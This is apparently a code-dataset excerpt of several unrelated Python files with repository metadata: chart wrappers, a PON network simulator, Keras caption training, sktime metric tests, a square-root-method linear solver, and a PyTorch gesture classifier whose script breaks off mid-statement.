return new_sha(''.join(sorted(self._parts()))).hexdigest()
# Now a whole mess of convenience classes
# *for those of us who dont speak API*
class QRCode(GChart):
def __init__(self, content='', **kwargs):
kwargs['choe'] = 'UTF-8'
if isinstance(content, str):
kwargs['chl'] = content
else:
kwargs['chl'] = content[0]
GChart.__init__(self, 'qr', None, **kwargs)
class _AbstractGChart(GChart):
o,t = {},None
def __init__(self, dataset, **kwargs):
kwargs.update(self.o)
GChart.__init__(self, self.t, dataset, **kwargs)
class Meter(_AbstractGChart): o,t = {'encoding':'text'},'gom'
class Line(_AbstractGChart): t = 'lc'
class LineXY(_AbstractGChart): t = 'lxy'
class HorizontalBarStack(_AbstractGChart): t = 'bhs'
class VerticalBarStack(_AbstractGChart): t = 'bvs'
class HorizontalBarGroup(_AbstractGChart): t = 'bhg'
class VerticalBarGroup(_AbstractGChart): t = 'bvg'
class Pie(_AbstractGChart): t = 'p'
class Pie3D(_AbstractGChart): t = 'p3'
class Venn(_AbstractGChart): t = 'v'
class Scatter(_AbstractGChart): t = 's'
class Sparkline(_AbstractGChart): t = 'ls'
class Radar(_AbstractGChart): t = 'r'
class RadarSpline(_AbstractGChart): t = 'rs'
class Map(_AbstractGChart): t = 't'
class PieC(_AbstractGChart): t = 'pc'
########################################
# Now for something completely different
########################################
class Text(GChart):
def render(self): pass
def __init__(self, *args):
GChart.__init__(self)
self['chst'] = 'd_text_outline'
args = list(map(str, color_args(args, 0, 3)))
assert args[2] in 'lrh', 'Invalid text alignment'
assert args[4] in '_b', 'Invalid font style'
self['chld'] = '|'.join(args).replace('\r\n','|')\
.replace('\r','|').replace('\n','|')
class Pin(GChart):
def render(self): pass
def __init__(self, ptype, *args):
GChart.__init__(self)
assert ptype in PIN_TYPES, 'Invalid type'
if ptype == "pin_letter":
args = color_args(args, 1,2)
elif ptype == 'pin_icon':
args = list(color_args(args, 1))
assert args[0] in PIN_ICONS, 'Invalid icon name'
elif ptype == 'xpin_letter':
args = list(color_args(args, 2,3,4))
assert args[0] in PIN_SHAPES, 'Invalid pin shape'
if not args[0].startswith('pin_'):
args[0] = 'pin_%s'%args[0]
elif ptype == 'xpin_icon':
args = list(color_args(args, 2,3))
assert args[0] in PIN_SHAPES, 'Invalid pin shape'
if not args[0].startswith('pin_'):
args[0] = 'pin_%s'%args[0]
assert args[1] in PIN_ICONS, 'Invalid icon name'
elif ptype == 'spin':
args = color_args(args, 2)
self['chst'] = 'd_map_%s'%ptype
self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
.replace('\r','|').replace('\n','|')
def shadow(self):
image = copy(self)
chsts = self['chst'].split('_')
chsts[-1] = 'shadow'
image.data['chst'] = '_'.join(chsts)
return image
class Note(GChart):
def render(self): pass
def __init__(self, *args):
GChart.__init__(self)
assert args[0] in NOTE_TYPES,'Invalid note type'
assert args[1] in NOTE_IMAGES,'Invalid note image'
if args[0].find('note')>-1:
self['chst'] = 'd_f%s'%args[0]
args = list(color_args(args, 3))
else:
self['chst'] = 'd_%s'%args[0]
assert args[2] in NOTE_WEATHERS,'Invalid weather'
args = args[1:]
self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
.replace('\r','|').replace('\n','|')
class Bubble(GChart):
def render(self): pass
def __init__(self, btype, *args):
GChart.__init__(self)
assert btype in BUBBLE_TYPES, 'Invalid type'
if btype in ('icon_text_small','icon_text_big'):
args = list(color_args(args, 3,4))
assert args[0] in BUBBLE_SICONS,'Invalid icon type'
elif btype == 'icon_texts_big':
args = list(color_args(args, 2,3))
assert args[0] in BUBBLE_LICONS,'Invalid icon type'
elif btype == 'texts_big':
args = color_args(args, 1,2)
self['chst'] = 'd_bubble_%s'%btype
self['chld'] = '|'.join(map(str, args)).replace('\r\n','|')\
.replace('\r','|').replace('\n','|')
def shadow(self):
image = copy(self)
image.data['chst'] = '%s_shadow'%self['chst']
return image
| 4,203 | 457 | 970 |
5f42ca913e67b584e2439069cf41f85b536f737a | 1,166 | py | Python | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | 1 | 2021-11-19T07:20:09.000Z | 2021-11-19T07:20:09.000Z | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | null | null | null | template.py | franbeep/TWDM-PON-Sim | c34f626c737f03d280bb96fd1dbd4eaa291383e3 | [
"MIT"
] | null | null | null | import sim
# seed
sim.random.seed(13)
# environment
env = sim.simpy.Environment()
# writer
# packet_w = Writer("packet_", start="# id src init_time waited_time freq processed_time\n")
# default values
sim.tg_default_size = lambda x: 5000
sim.tg_default_dist = lambda x: 1
sim.ONU_consumption = lambda x: 15
sim.PN_consumption = lambda x: 25
sim.Ant_consumption = lambda x: 7
sim.DBA_IPACT_default_bandwidth = 5000
# constants
# topology
antenas = 3
onus = 2
pns = 2
splts = 1
max_freqs = 10
matrix = [
[0,3,10000],
[1,3,9000],
[2,4,13000],
[3,5,500],
[4,7,25000],
[5,7,23000],
[7,6,8000]
]
# nodes
nodes = sim.create_topology(env, antenas, onus, pns, splts, matrix, max_freqs)
# rules
nodes[5].end() # node 5 starts offline
nodes[0].end() # antenna 0 starts offline
nodes[1].end() # antenna 1 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
nodes[3].end() # onu 0 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
print("Begin.")
env.run(until=10)
print("End.")
# consumption
for n in nodes:
if(isinstance(n, sim.Splitter)):
continue
else:
print(str(n), "had consumption of:", n.consumption()) | 18.507937 | 92 | 0.678388 | import sim
# seed
sim.random.seed(13)
# environment
env = sim.simpy.Environment()
# writer
# packet_w = Writer("packet_", start="# id src init_time waited_time freq processed_time\n")
# default values
sim.tg_default_size = lambda x: 5000
sim.tg_default_dist = lambda x: 1
sim.ONU_consumption = lambda x: 15
sim.PN_consumption = lambda x: 25
sim.Ant_consumption = lambda x: 7
sim.DBA_IPACT_default_bandwidth = 5000
# constants
# topology
antenas = 3
onus = 2
pns = 2
splts = 1
max_freqs = 10
matrix = [
[0,3,10000],
[1,3,9000],
[2,4,13000],
[3,5,500],
[4,7,25000],
[5,7,23000],
[7,6,8000]
]
# nodes
nodes = sim.create_topology(env, antenas, onus, pns, splts, matrix, max_freqs)
# rules
nodes[5].end() # node 5 starts offline
nodes[0].end() # antenna 0 starts offline
nodes[1].end() # antenna 1 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
nodes[3].end() # onu 0 starts offline
print(nodes[3], "enabled:", nodes[3].enabled)
print("Begin.")
env.run(until=10)
print("End.")
# consumption
for n in nodes:
if(isinstance(n, sim.Splitter)):
continue
else:
print(str(n), "had consumption of:", n.consumption()) | 0 | 0 | 0 |
67cea391e6faee05921bb6b7f027d954dc5deb2b | 3,186 | py | Python | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | null | null | null | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | 20 | 2019-11-28T06:38:26.000Z | 2022-03-12T00:41:52.000Z | train.py | team-eyespace/show-tell-api | b9947091083174e5469fcf3cf3079fabd73789dd | [
"MIT"
] | 1 | 2019-12-22T08:58:30.000Z | 2019-12-22T08:58:30.000Z | '''
File to train the NIC model, based on the paper:
https://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Vinyals_Show_and_Tell_2015_CVPR_paper.pdf
'''
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model
from keras.optimizers import Adam
from keras.utils import plot_model
from NIC import model
from preprocessing.text import create_tokenizer
from utils import batch_generator
from TensorBoardCaption import TensorBoardCaption
if __name__ == "__main__":
dict_dir = './datasets/features_dict.pkl'
train_dir = './datasets/Flickr8k_text/Flickr_8k.trainImages.txt'
dev_dir = './datasets/Flickr8k_text/Flickr_8k.devImages.txt'
token_dir = './datasets/Flickr8k_text/Flickr8k.token.txt'
# where to put the model weigths
params_dir = './model-params'
dirs_dict={'dict_dir':dict_dir, 'train_dir':train_dir, 'dev_dir':dev_dir,
'token_dir':token_dir, 'params_dir':params_dir}
training(dirs_dict, lr=0.001, decay=0., reg = 1e-4, batch_size = 120, epochs = 2,
max_len = 24, initial_epoch = 0, previous_model = None)
| 40.846154 | 115 | 0.710609 | '''
File to train the NIC model, based on the paper:
https://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Vinyals_Show_and_Tell_2015_CVPR_paper.pdf
'''
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model
from keras.optimizers import Adam
from keras.utils import plot_model
from NIC import model
from preprocessing.text import create_tokenizer
from utils import batch_generator
from TensorBoardCaption import TensorBoardCaption
def training(dirs_dict, lr, decay, reg, batch_size, epochs, max_len, initial_epoch, previous_model = None):
dict_dir = dirs_dict['dict_dir']
token_dir = dirs_dict['token_dir']
train_dir = dirs_dict['train_dir']
dev_dir = dirs_dict['dev_dir']
params_dir = dirs_dict['params_dir']
# Use Tokenizer to create vocabulary
tokenizer = create_tokenizer(train_dir, token_dir, start_end = True)
# Progressive loading
# if batch size of training set is 30 and total 30000 sentences, then 1000 steps.
# if batch size of dev set is 50 and total 5000 sentences, then 100 steps.
generator_train = batch_generator(batch_size, max_len, tokenizer, dict_dir, train_dir, token_dir)
generator_dev = batch_generator(50, max_len, tokenizer, dict_dir, dev_dir, token_dir)
vocab_size = tokenizer.num_words or (len(tokenizer.word_index)+1)
# Define NIC model structure
NIC_model = model(vocab_size, max_len, reg)
if not previous_model:
NIC_model.summary()
plot_model(NIC_model, to_file='./model.png',show_shapes=True)
else:
NIC_model.load_weights(previous_model, by_name = True, skip_mismatch=True)
# Define checkpoint callback
file_path = params_dir + '/model-ep{epoch:03d}-loss{loss:.4f}-val_loss{val_loss:.4f}.h5'
checkpoint = ModelCheckpoint(file_path, monitor='val_loss', verbose=1, save_weights_only = True, period=1)
tbc = TensorBoardCaption(tokenizer, vocab_size, max_len, log_dir = './logs',
feed_pics_dir = './put-your-image-here',
model_params_dir = params_dir)
# Compile the model
NIC_model.compile(loss='categorical_crossentropy', optimizer=Adam(lr = lr, decay=decay), metrics=['accuracy'])
# train
NIC_model.fit_generator(generator_train, steps_per_epoch=30000//batch_size, epochs=epochs, verbose=2,
callbacks=[checkpoint, tbc],
validation_data = generator_dev, validation_steps = 100, initial_epoch = initial_epoch)
if __name__ == "__main__":
dict_dir = './datasets/features_dict.pkl'
train_dir = './datasets/Flickr8k_text/Flickr_8k.trainImages.txt'
dev_dir = './datasets/Flickr8k_text/Flickr_8k.devImages.txt'
token_dir = './datasets/Flickr8k_text/Flickr8k.token.txt'
# where to put the model weigths
params_dir = './model-params'
dirs_dict={'dict_dir':dict_dir, 'train_dir':train_dir, 'dev_dir':dev_dir,
'token_dir':token_dir, 'params_dir':params_dir}
training(dirs_dict, lr=0.001, decay=0., reg = 1e-4, batch_size = 120, epochs = 2,
max_len = 24, initial_epoch = 0, previous_model = None)
| 2,035 | 0 | 23 |
1bc936cdd0503d0f79ce563f75d7d7191567ce61 | 1,943 | py | Python | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | 3 | 2017-01-18T21:20:26.000Z | 2019-01-22T19:11:58.000Z | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | null | null | null | trees/tssb/util.py | sharadmv/trees | ed8ce87718da753a13fe1707487df7b93037ae2f | [
"MIT"
] | 3 | 2016-10-13T06:31:25.000Z | 2021-11-08T19:09:03.000Z | import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import networkx as nx
| 29.439394 | 89 | 0.594956 | import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import networkx as nx
def plot_tssb(tssb, ax=None):
g = nx.DiGraph()
if ax:
ax.set_axis_off()
assert tssb.root is not None
add_nodes(g, tssb.root)
pos = nx.graphviz_layout(g, prog='dot', args='-Granksep=100.0')
labels = {n: n.point_count for n in g.nodes()}
nodes = nx.draw_networkx_nodes(g, pos,
node_color='b',
node_size=300,
alpha=0.8, ax=ax)
nx.draw_networkx_edges(g, pos,
alpha=0.8, arrows=False, ax=ax)
labels = nx.draw_networkx_labels(g, pos, labels, font_size=12, font_color='w', ax=ax)
return g, nodes, labels
def add_nodes(g, node):
for c, child_node in node.children.items():
g.add_edge(node, child_node)
add_nodes(g, child_node)
def generate_data(N, tssb, collect=True):
data = []
y = []
for i in xrange(N):
node, index = tssb.sample_one()
data.append(node.sample_one())
y.append(index)
if collect:
tssb.garbage_collect()
return np.array(data), y
def plot_data(X, z, tssb=None):
nodes = set(z)
color_map = sns.color_palette("coolwarm", len(set(map(len, nodes))))
colors = {}
for c, n in zip(color_map, set(map(len, nodes))):
colors[n] = c
for i, (x, y) in enumerate(X):
plt.scatter(x, y, color=colors[len(z[i])])
def save_tssb(tssb, location):
with open(location, 'wb') as fp:
pickle.dump(tssb.get_state(), fp)
def load_tssb(location):
with open(location, 'rb') as fp:
tssb = pickle.load(fp)
return tssb
def print_tssb(t, y, N):
points = xrange(N)
nodes = set([t.point_index(point)[1] for point in points])
assignments = {}
for node in nodes:
assignments[node] = [y[p] for p in t.get_node(node).points]
return assignments
| 1,684 | 0 | 161 |
d4f988f814604af80219f450450b3d48b4a82f8f | 2,034 | py | Python | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | 1 | 2021-12-22T02:45:39.000Z | 2021-12-22T02:45:39.000Z | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | null | null | null | sktime/performance_metrics/tests/test_metrics_classes.py | khrapovs/sktime | 1589d007ef5dbcdc1f42f2c8278919ebed516358 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for classes in _classes module."""
from inspect import getmembers, isclass
import numpy as np
import pandas as pd
import pytest
from sktime.performance_metrics.forecasting import _classes
from sktime.utils._testing.series import _make_series
metric_classes = getmembers(_classes, isclass)
exclude_starts_with = ("_", "Base")
metric_classes = [x for x in metric_classes if not x[0].startswith(exclude_starts_with)]
names, metrics = zip(*metric_classes)
@pytest.mark.parametrize("n_columns", [1, 2])
@pytest.mark.parametrize("multioutput", ["uniform_average", "raw_values"])
@pytest.mark.parametrize("metric", metrics, ids=names)
def test_metric_output_direct(metric, multioutput, n_columns):
"""Test output is of correct type, dependent on multioutput.
Also tests that four ways to call the metric yield equivalent results:
1. using the __call__ dunder
2. calling the evaluate method
"""
y_pred = _make_series(n_columns=n_columns, n_timepoints=20, random_state=21)
y_true = _make_series(n_columns=n_columns, n_timepoints=20, random_state=42)
# coerce to DataFrame since _make_series does not return consisten output type
y_pred = pd.DataFrame(y_pred)
y_true = pd.DataFrame(y_true)
res = dict()
res[1] = metric(multioutput=multioutput)(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
res[2] = metric(multioutput=multioutput).evaluate(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
if multioutput == "uniform_average":
assert all(isinstance(x, float) for x in res.values())
elif multioutput == "raw_values":
assert all(isinstance(x, np.ndarray) for x in res.values())
assert all(x.ndim == 1 for x in res.values())
assert all(len(x) == len(y_true.columns) for x in res.values())
# assert results from all options are equal
assert np.allclose(res[1], res[2])
| 32.806452 | 88 | 0.701573 | # -*- coding: utf-8 -*-
"""Tests for classes in _classes module."""
from inspect import getmembers, isclass
import numpy as np
import pandas as pd
import pytest
from sktime.performance_metrics.forecasting import _classes
from sktime.utils._testing.series import _make_series
metric_classes = getmembers(_classes, isclass)
exclude_starts_with = ("_", "Base")
metric_classes = [x for x in metric_classes if not x[0].startswith(exclude_starts_with)]
names, metrics = zip(*metric_classes)
@pytest.mark.parametrize("n_columns", [1, 2])
@pytest.mark.parametrize("multioutput", ["uniform_average", "raw_values"])
@pytest.mark.parametrize("metric", metrics, ids=names)
def test_metric_output_direct(metric, multioutput, n_columns):
"""Test output is of correct type, dependent on multioutput.
Also tests that four ways to call the metric yield equivalent results:
1. using the __call__ dunder
2. calling the evaluate method
"""
y_pred = _make_series(n_columns=n_columns, n_timepoints=20, random_state=21)
y_true = _make_series(n_columns=n_columns, n_timepoints=20, random_state=42)
# coerce to DataFrame since _make_series does not return consisten output type
y_pred = pd.DataFrame(y_pred)
y_true = pd.DataFrame(y_true)
res = dict()
res[1] = metric(multioutput=multioutput)(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
res[2] = metric(multioutput=multioutput).evaluate(
y_true=y_true,
y_pred=y_pred,
y_pred_benchmark=y_pred,
y_train=y_true,
)
if multioutput == "uniform_average":
assert all(isinstance(x, float) for x in res.values())
elif multioutput == "raw_values":
assert all(isinstance(x, np.ndarray) for x in res.values())
assert all(x.ndim == 1 for x in res.values())
assert all(len(x) == len(y_true.columns) for x in res.values())
# assert results from all options are equal
assert np.allclose(res[1], res[2])
| 0 | 0 | 0 |
19da141c48b7413d93cb25e65307a76b60c3d964 | 3,952 | py | Python | 4 term/MNA/Lab 3/main.py | mrojaczy/Labs | 21cd2ad3ddf8fa3b64cf253d147a4a04ad0667ab | [
"Apache-2.0"
] | 1 | 2020-03-15T17:11:23.000Z | 2020-03-15T17:11:23.000Z | 4 term/MNA/Lab 3/main.py | Asphobel/Labs | ee827143b32b691dd7736ba4888a4a9625b4694a | [
"Apache-2.0"
] | null | null | null | 4 term/MNA/Lab 3/main.py | Asphobel/Labs | ee827143b32b691dd7736ba4888a4a9625b4694a | [
"Apache-2.0"
] | null | null | null | import numpy as np
import numpy.linalg as la
import math
if __name__ == '__main__':
n = 4
matrixA = np.array([[3.738, 0.195, 0.275, 0.136],
[0.519, 5.002, 0.405, 0.283],
[0.306, 0.381, 4.812, 0.418],
[0.272, 0.142, 0.314, 3.935]])
matrixB = np.array([0.815, 0.191, 0.423, 0.352])
# n = int(input("Введите размерность системы уравнений "))
# print("Система уравнений будет иметь вид:")
# for i in range(n):
# for j in range(n):
# print("a{0}{1}*x{2}".format(i + 1, j + 1, j + 1), end="")
# if j != n - 1:
# print("+", end="")
# else:
# print("=", end="")
# print("b{0}".format(i + 1))
# matrixA = np.zeros((n, n))
# matrixB = np.zeros(n)
# for i in range(n):
# for j in range(n):
# matrixA[i][j] = input("a{0}{1}=".format(i + 1, j + 1))
# matrixB[i] = input("b{0}=".format(i + 1))
print("Система уравнений будет иметь вид:")
printSystemOfEquations(n, matrixA, matrixB)
squareRootMethod(n, matrixA, matrixB)
| 35.603604 | 88 | 0.527328 | import numpy as np
import numpy.linalg as la
import math
def squareRootMethod(n, matrixA, matrixB):
extendedMatrix = np.column_stack((matrixA, matrixB))
if la.matrix_rank(extendedMatrix) != la.matrix_rank(matrixA):
print("Система не имеет решений")
return
elif la.matrix_rank(matrixA) != n:
print("Система имеет бесконечно много решений")
return
matrixB = np.matmul(np.transpose(matrixA), matrixB)
matrixA = np.matmul(np.transpose(matrixA), matrixA)
print("После симметризации система уравнений будет иметь вид:")
printSystemOfEquations(n, matrixA, matrixB)
matrixU = np.triu(matrixA)
for i in range(n):
for j in range(i):
matrixU[i][i] -= matrixU[j][i] ** 2
matrixU[i][i] = math.sqrt(matrixU[i][i])
for j in range(i + 1, n):
for k in range(i):
matrixU[i][j] -= matrixU[k][i] * matrixU[k][j]
matrixU[i][j] /= matrixU[i][i]
matrixTransU = np.transpose(matrixU)
matrixY = np.copy(matrixB)
for i in range(n):
for j in range(i):
matrixY[i] -= matrixY[j] * matrixTransU[i][j]
matrixY[i] /= matrixTransU[i][i]
matrixX = np.copy(matrixY)
for i in range(n):
for j in range(i):
matrixX[n - 1 - i] -= matrixX[n - 1 - j] * matrixU[n - 1 - i][n - 1 - j]
matrixX[n - 1 - i] /= matrixU[n - 1 - i][n - 1 - i]
print("Решение:")
for i in range(n):
print("x{0}={1}".format(i + 1, matrixX[i]), end=" ")
print("\n")
determinant = 1
for i in range(n):
determinant *= matrixU[i][i] ** 2
print("Определитель матрицы A равен: |A|={0}".format(determinant), end="\n\n")
inverseMatrixA = calculateInverseMatrix(matrixU)
print("Обратная матрица:")
print(inverseMatrixA)
def calculateInverseMatrix(matrixU):
matrixTransU = np.transpose(matrixU)
inverseMatrix = np.empty((n, 0))
for k in range(n):
matrixE = np.zeros(n)
matrixE[k] = 1
matrixY = np.copy(matrixE)
for i in range(n):
for j in range(i):
matrixY[i] -= matrixY[j] * matrixTransU[i][j]
matrixY[i] /= matrixTransU[i][i]
matrixX = np.copy(matrixY)
for i in range(n):
for j in range(i):
matrixX[n - 1 - i] -= matrixX[n - 1 - j] * matrixU[n - 1 - i][n - 1 - j]
matrixX[n - 1 - i] /= matrixU[n - 1 - i][n - 1 - i]
inverseMatrix = np.column_stack((inverseMatrix, matrixX))
return inverseMatrix
def printSystemOfEquations(n, matrixA, matrixB):
for i in range(n):
for j in range(n):
print("{0}*x{1}".format(matrixA[i][j], j + 1), end="")
if j != n - 1:
print("+", end="")
else:
print("=", end="")
print(matrixB[i])
print()
if __name__ == '__main__':
n = 4
matrixA = np.array([[3.738, 0.195, 0.275, 0.136],
[0.519, 5.002, 0.405, 0.283],
[0.306, 0.381, 4.812, 0.418],
[0.272, 0.142, 0.314, 3.935]])
matrixB = np.array([0.815, 0.191, 0.423, 0.352])
# n = int(input("Введите размерность системы уравнений "))
# print("Система уравнений будет иметь вид:")
# for i in range(n):
# for j in range(n):
# print("a{0}{1}*x{2}".format(i + 1, j + 1, j + 1), end="")
# if j != n - 1:
# print("+", end="")
# else:
# print("=", end="")
# print("b{0}".format(i + 1))
# matrixA = np.zeros((n, n))
# matrixB = np.zeros(n)
# for i in range(n):
# for j in range(n):
# matrixA[i][j] = input("a{0}{1}=".format(i + 1, j + 1))
# matrixB[i] = input("b{0}=".format(i + 1))
print("Система уравнений будет иметь вид:")
printSystemOfEquations(n, matrixA, matrixB)
squareRootMethod(n, matrixA, matrixB)
| 2,886 | 0 | 69 |
a4e1c2123e1d9a7067b7fb0d3a9954f49505f739 | 9,003 | py | Python | popnn_torch.py | bhardwajRahul/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 102 | 2018-11-03T03:39:10.000Z | 2022-03-31T03:11:54.000Z | popnn_torch.py | shuren007/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 2 | 2019-06-14T14:03:49.000Z | 2020-04-20T12:14:27.000Z | popnn_torch.py | shuren007/Gesture-Recognition | e4722ecb58e5c65f34f92a21058eae81ed3c84e0 | [
"MIT"
] | 34 | 2018-12-13T23:20:53.000Z | 2022-01-09T16:37:34.000Z | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
''' Imports '''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import argparse
import random
import numpy as np
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import operator
import os
import sys
import signal
from Var import Var
from DataLoader import DataLoader
import sklearn.model_selection as ms
import sklearn.preprocessing as pr
plt.switch_backend('agg')
use_cuda = torch.cuda.is_available()
v = Var()
num_classes = v.get_num_classes()
popnn_vars = v.get_POPNN()
class Model(nn.Module):
''' FC Neural Network '''
def forward(self, input):
''' Forward pass through network '''
output = input.view(-1, self.num_features * self.input_size)
output = self.drop(F.relu(self.fc1(output)))
output = self.drop(F.relu(self.fc2(output)))
output = self.drop(F.relu(self.fc3(output)))
output = self.drop(F.relu(self.fc4(output)))
output = F.logsigmoid(output)
return output
def accuracy(output, label):
''' Check if network output is equal to the corresponding label '''
max_idx, val = max(enumerate(output[0]), key=operator.itemgetter(1))
out = torch.zeros(1, num_classes).cuda() if use_cuda else torch.zeros(1, num_classes)
out[0][max_idx] = 1
if torch.eq(out.float(), label).byte().all():
return 1
else:
return 0
def train(model, optim, criterion, datum, label):
''' Modify weights based off cost from one datapoint '''
optim.zero_grad()
output = model(datum)
output = output.view(1, num_classes)
is_correct = accuracy(output, label)
loss = criterion(output, label)
loss.backward()
optim.step()
return loss.item(), is_correct
def test_accuracy(model, x_test, y_test):
''' Accuracy of Model on test data '''
num_correct = 0
for test, label in zip(x_test, y_test):
output = model(test.view(1, model.num_features, model.input_size))
is_correct = accuracy(output, label)
num_correct += is_correct
return num_correct / float(x_test.size()[0])
def create_plot(loss, train_acc, test_acc, num_epochs, plot_every, fn):
''' Creates graph of loss, training accuracy, and test accuracy '''
plt.figure()
fig, ax = plt.subplots()
x_ticks = range(plot_every, num_epochs + 1, plot_every)
y_ticks = np.arange(0, 1.1, 0.1)
plt.subplot(111)
plt.plot(x_ticks, loss, label="Average Loss")
plt.plot(x_ticks, train_acc, label="Training Accuracy")
plt.plot(x_ticks, test_acc, label="Validation Accuracy")
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0.)
plt.xticks(x_ticks)
plt.yticks(y_ticks)
plt.axis([0, num_epochs, 0, 1])
plt.ylabel("Average Loss")
plt.xlabel("Epoch")
''' Save graph '''
plt.savefig(fn)
def train_iters(model, x_train, y_train, x_test, y_test, fn, lr=popnn_vars['lr'], batch_size=popnn_vars["batch_size"], num_epochs=popnn_vars["num_epochs"], print_every=popnn_vars['print_every'], plot_every=popnn_vars['plot_every']):
''' Trains neural net for numEpochs iters '''
num = fn.split('/')[-1].split('.')[0].split('popnn')[-1]
plot_fn = "graphs/popnn/lossAvg%s.png" % num
def sigint_handler(sig, iteration):
''' Handles Ctrl + C. Save the data into npz files. Data inputted into thenetwork '''
torch.save(model.state_dict(), fn)
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
print("Saving model and Exiting")
sys.exit(0)
''' Initialize sigint handler '''
signal.signal(signal.SIGINT, sigint_handler)
plot_loss_avgs = []
epochs = []
train_accuracies = []
test_accuracies = []
loss_total = 0
plot_loss_total = 0
num_correct = 0
plot_correct = 0
optimizer = optim.Adam(model.parameters(), lr=lr)
if gamma != None:
scheduler = StepLR(optimizer, step_size=300, gamma=gamma)
criterion = nn.BCEWithLogitsLoss()
y_train = torch.from_numpy(y_train).float().cuda(
) if use_cuda else torch.from_numpy(y_train).float()
x_train = torch.from_numpy(x_train).float().cuda(
) if use_cuda else torch.from_numpy(x_train).float()
y_test = torch.from_numpy(y_test).float().cuda(
) if use_cuda else torch.from_numpy(y_test).float()
x_test = torch.from_numpy(x_test).float().cuda(
) if use_cuda else torch.from_numpy(x_test).float()
for current_epoch in tqdm(range(num_epochs)):
if gamma != None:
scheduler.step()
for i in range(batch_size):
frame_num = random.randint(0, x_train.size()[0] - 1)
frame = x_train[frame_num].view(1, model.num_features, model.input_size)
label = y_train[frame_num].view(1, num_classes)
loss, is_correct = train(
model, optimizer, criterion, frame, label)
num_correct += is_correct
loss_total += loss
plot_correct += is_correct # Make a copy of numCorrect for plot_every
plot_loss_total += loss
if (current_epoch + 1) % print_every == 0:
avg_loss = loss_total / (print_every * batch_size)
train_acc = num_correct / float(print_every * batch_size)
test_acc = test_accuracy(model, x_test, y_test)
tqdm.write("[Epoch %d/%d] Avg Loss: %f, Training Acc: %f, Validation Acc: %f" %
(current_epoch + 1, num_epochs, avg_loss, train_acc, test_acc))
loss_total = 0
num_correct = 0
if (current_epoch + 1) % plot_every == 0:
plot_test_acc = test_accuracy(model, x_test, y_test)
plot_train_acc = plot_correct / float(plot_every * batch_size)
train_accuracies.append(plot_train_acc)
test_accuracies.append(plot_test_acc)
avg_loss = plot_loss_total / (plot_every * batch_size)
plot_loss_avgs.append(avg_loss)
epochs.append(current_epoch + 1)
plot_correct = 0
plot_loss_total = 0
create_plot(plot_loss_avgs, train_accuracies,
test_accuracies, num_epochs, plot_every, plot_fn)
if __name__ == "__main__":
''' Argparse Flags '''
parser = argparse.ArgumentParser(description='Fully Connected Feed Forward Net on tf-openpose data')
parser.add_argument("--transfer", "-t", dest="transfer", action="store_true")
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument("--ckpt-fn", "-c", dest="ckpt_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--save-fn", "-s", dest="save_fn",
type=str, default="popnn000.ckpt")
parser.add_argument("--learning-rate", "-lr",
dest="learning_rate", type=float, default=0.000035)
parser.add_argument("--num-epochs", "-e", dest="num_epochs",
type=int, default=1000, help='number of training iterations')
parser.add_argument("--batch-size", "-b", dest="batch_size", type=int,
default=256, help='number of training samples per epoch')
parser.add_argument('--num-frames', '-f', dest='num_frames', type=int, default=4,
help='number of consecutive frames where distances are accumulated')
parser.add_argument('--lr-decay-rate', '-d', dest='gamma', type=float, default=None)
parser.add_argument('--only-arm', '-o', dest='use_arm', action='store_true',
help="only use arm data")
parser.add_argument('--multiply-by-score', '-m', dest='m_score', action='store_true')
''' Set argparse defaults '''
parser.set_defaults(use_arm=False)
parser.set_defaults(transfer=False)
parser.set_defaults(debug=False)
parser.set_defaults(m_score=False)
''' Set variables to argparse arguments '''
args = parser.parse_args()
transfer = args.transfer
debug = args.debug
gamma = args.gamma
use_arm = args.use_arm
m_score = m_score
ckpt_fn = "lstmpts/popnn/%s" % args.ckpt_fn
fn = "lstmpts/popnn/%s" % args.save_fn
v = Var(use_arm)
input_size = v.get_size()
num_features = v.get_num_features()
dropout = popnn_vars['dropout']
model = Model(input_size=input_size, num_features=num_features, dropout=dropout)
model = model.cuda() if use_cuda else model
if transfer:
